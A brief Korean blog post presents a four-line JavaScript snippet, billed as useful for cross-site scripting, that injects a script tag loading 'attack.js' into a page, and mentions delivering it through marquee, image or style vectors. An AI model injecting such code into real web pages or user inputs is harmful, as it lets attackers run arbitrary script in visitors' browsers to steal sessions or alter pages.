XSS에 유용한 자바스크립트

var script = document.createElement('script');
script.type = 'text/javascript';
script.src = 'attack.js';
document.body.appendChild(script);


ㅡ_ㅡ;;;;


그래도 브라우저 측에서 차단하지 않을까 반신반의하며 실행했는데.. 잘된다.


대..대단하군!


로드방법은 마퀴, 이미지, 스타일등으로.. ㅋ


덧: XSS 연구하다가 발견한 것이 아니라 전혀 관련없는 삽질을 하던 중에 알게된 것임!

Tag

Leave Comments